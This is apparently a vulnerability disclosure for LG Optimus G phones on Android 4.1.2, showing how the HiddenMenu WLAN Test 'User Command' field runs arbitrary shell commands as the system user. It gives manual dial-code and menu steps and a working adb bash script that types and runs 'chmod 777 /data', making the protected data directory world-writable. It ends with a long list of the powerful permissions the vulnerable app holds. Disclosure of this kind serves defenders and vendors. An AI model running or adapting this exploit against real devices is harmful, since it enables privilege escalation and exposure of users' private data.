Device: LG Optimus G E973 (Others affected)
Firmware: Android 4.1.2 JZO54k (Others affected)
Evidence: http://youtu.be/ZfbDIpTY-t4

A vulnerability in LG's "HiddenMenu" allows you to execute shell commands as the system user, with a large array of additional permissions (Groups). This vulnerability opens up the device to further attacks. Due to the large number of models sharing similar firmware, I have no idea how many devices are affected.

Details:

Dial: 3845#*XXX# (XXX to be replaced with model number, in this case 3845#*973#)
HiddenMenu will open, select WLAN Test, then select Wi-Fi Ping Test/User Command, then select User Command.
Replace the tcpdump command with the command you wish to run as system user.
Then press cancel (not ok).
The application will execute the command as system user.

Automated version (chmod 777 /data):

#!/bin/bash
# bash is required for the [[ ]] and (( )) constructs below
adb shell ls -l /data
adb shell input tap 45 1200
adb shell input tap 700 500
adb shell input tap 350 800
adb shell input tap 35 700
adb shell input tap 350 700
adb shell input tap 700 1000
adb shell input tap 35 1000
adb shell input tap 700 800
adb shell input tap 35 800
adb shell input tap 700 500
adb shell input tap 700 1000
adb shell input tap 700 900
adb shell input tap 700 900
adb shell input tap 700 300
max=46
count=1
# keyevent 67 is KEYCODE_DEL
while [[ $count -le $max ]]
do
    adb shell input keyevent 67
    ((count++))
done
# keyevent 62 is KEYCODE_SPACE
adb shell input text chmod
adb shell input keyevent 62
adb shell input text 777
adb shell input keyevent 62
adb shell input text "/data"
adb shell input tap 600 600
adb shell ls -l /data

Additional permissions granted to vulnerable application:

"android.permission.REBOOT"
"android.permission.WRITE_EXTERNAL_STORAGE"
"android.permission.BLUETOOTH"
"android.permission.BLUETOOTH_ADMIN"
"android.permission.DEVICE_POWER"
"android.permission.WRITE_SETTINGS"
"android.permission.READ_SETTINGS"
"android.permission.READ_CONTACTS"
"android.permission.WRITE_CONTACTS"
"android.permission.HARDWARE_TEST"
"android.permission.VIBRATE"
"android.permission.WRITE_APN_SETTINGS"
"android.permission.ACCESS_WIFI_STATE"
"android.permission.CHANGE_WIFI_STATE"
"android.permission.FLASHLIGHT"
"android.permission.READ_ERS"
"android.permission.WRITE_ERS"
"android.permission.MASTER_CLEAR"
"android.permission.MODIFY_AUDIO_SETTINGS"
"android.permission.ACCESS_COARSE_LOCATION"
"android.permission.ACCESS_FINE_LOCATION"
"android.permission.ACCESS_LOCATION_EXTRA_COMMANDS"
"android.permission.INTERNET"
"android.permission.BLUETOOTH"
"android.permission.BLUETOOTH_ADMIN"
"com.lge.permission.LGSystemDB_READ"
"com.lge.permission.LGSystemDB_WRITE"
"android.permission.MOUNT_UNMOUNT_FILESYSTEMS"
"android.permission.ACCESS_LGDRM"
"android.permission.DISABLE_KEYGUARD"
"android.permission.CAMERA"
"android.permission.WAKE_LOCK"
"android.permission.WRITE_SETTINGS"
"android.permission.VIBRATE"
"android.permission.ACCESS_FINE_LOCATION"
"android.permission.WRITE_EXTERNAL_STORAGE"
"android.permission.CAMERA"
"android.permission.RECORD_AUDIO"
"android.permission.DISABLE_KEYGUARD"
"android.permission.MODIFY_AUDIO_SETTINGS"
"android.permission.WRITE_SETTINGS"
"android.permission.WAKE_LOCK"
"android.permission.SET_TIME"
"com.android.providers.syncml.permission.READ_SYNCML_PROFILE"
"com.android.providers.syncml.permission.WRITE_SYNCML_PROFILE"
"com.lge.permission.FACTORY"
"com.lge.permission.ACCESS_LGFOTA"
"android.permission.ACCESS_CACHE_FILESYSTEM"
"com.lge.permission.WV_PROVISION"
"com.lge.permission.PR_PROVISION"
"android.permission.READ_EXTERNAL_STORAGE"
"android.permission.CHANGE_NETWORK_STATE"
"com.lge.permission.LGHIDDEN"